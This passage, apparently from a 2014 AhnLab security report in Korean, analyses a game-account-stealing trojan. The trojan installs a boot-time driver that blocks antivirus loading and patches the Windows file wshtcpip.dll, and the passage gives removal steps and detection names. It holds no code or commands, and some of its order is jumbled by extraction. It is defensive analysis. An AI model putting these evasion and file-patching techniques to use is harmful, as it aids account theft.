tbl이지만, PE(Portable Executable) 헤더를확인하면시스템드라이버파일이다. 옵셔널헤더 (Optional Header) 의서브시스템 (Subsystem) 값을통해파일의종류 ( 드라이버파일 / GUI 파일 / CUI 파일 ) 를확인할수있다. [ 그림 13] 악성코드아이콘 27

28 해당악성코드를실행하면온라인게임계정을탈취하는악성코드와백신의동작을방해하는악성코드를생성한다 ([ 그림 14]). (wshtcpip.dll) 을생성한다. 패치된악성파일은정상파일의기능을그대로복사하여시스템파일의변조로인한오류가발생하지않도록하였다.([ 그림 18]) [ 그림 14] 생성된악성코드 [ 그림 15] 와같이 C:\Windows\System32\drivers 경로에생성된 [ 랜덤문자열 ].sys는레지스트리에등록되어부팅시서비스로자동실행된다. 이때드라이버로드를방해하여백신이정상적으로동작하지못하게한다. [ 그림 18] 변경된이름으로저장된정상 wshtcpip.dll 파일 해당악성코드는안랩에서제공하는온라인게임핵전용백신으로변종에대한치료도가능하다. [ 그림 15] 서비스에등록된악성코드 해당악성파일이실행되면서비스로드를방해하여백신이원활하게동작하지않는다. 따라서백신을정상적으로실행시키려면해당파일을직접삭제하거나전용백신으로치료해야한다. 악성코드에의해생성된 wshtcpip.dll 은윈도정상시스템파일로보이지만, 정상파일을패치 (patch) 한악성파일이다. 파일의속성정보를보면두파일이다르다. 해당악성파일은정상프로세스에로드되어 [ 그림 16] 과같이온라인게임의계정탈취를시도한다. [ 그림 16] 계정이유출된온라인게임 [ 그림 19] 온라인게임핵전용백신실행화면 전용백신을사용할수없는상황일경우해당악성코드를정상파일로바꿔주면치료할수있다. C:\Windows\winsxs 폴더는애플리케이션이필요한 dll 파일에대한상세정보를별도의파일로보관한후필요할때해당 dll 파일을선택하여사용할수있다. 같은 dll 파일이라도여러버전이있다. 프로그램마다요구버전이달라호환성유지를위해버전별 dll 파일을 C:\Windows\winsxs 폴더에보관하고있다. 파일을수동으로관리하려면 winsxs 폴더에서정상 wshtcpip.dll 파일과 midmap.dll 파일을복사하여기존경로 (C:\Windows\System32) 에복사해주면된다. [ 그림 20] winsxs 폴더에위치한 wshtcpip.dll 파일 [ 그림 17] 정상 wshtcpip.dll( 좌 ), 변조된 wshtcpip.dll( 우 ) 해당파일은윈도시스템파일로, 삭제하면인터넷을사용할수없거나블루스크린 (BSOD) 현상이나타날수있다. Qbridge.exe 파일은 wshtcpip.dll 파일을변조시키기위해해당파일을 C:\Windows\ System32 경로에 ws2tcpip.dll이라는이름으로복사한다. 그리고 ws2tcpip.dll 파일을이용하여정상파일을패치한악성파일 온라인게임의계정유출은금전적인피해로이어질수있으므로사용자들의각별한주의가필요하다. 백신을포함한응용프로그램을항상최신버전으로유지하여언제어떻게일어날지모르는보안위협에대비해야한다. V3 제품에서는관련악성코드를다음과같이진단하고있다. <V3 제품군의진단명 > Win-Trojan/Onlinegamehack ( ) Win-Trojan/Onlinegames ( ) Win-Trojan/Onlinegamehack ( ) Trojan/Win32.Agent ( ) 28

29 발행인 : 권치중발행처 : 주식회사안랩경기도성남시분당구판교역로 220 T F 편집인 : 안랩콘텐츠기획팀디자인 : 안랩 UX디자인팀 2014 AhnLab, Inc. All rights reserved. 본간행물의어떤부분도안랩의서면동의없이복제, 복사, 검색시스템으로저장또는전송될수없습니다. 안랩, 안랩로고는안랩의등록상표입니다. 그외다른제품또는회사이름은해당소유자의상표또는등록상표일수있습니다. 본문서에수록된정보는고지없이변경될수있습니다. 29

30 경기도성남시분당구판교역로 220 T F AhnLab, Inc. All rights reserved.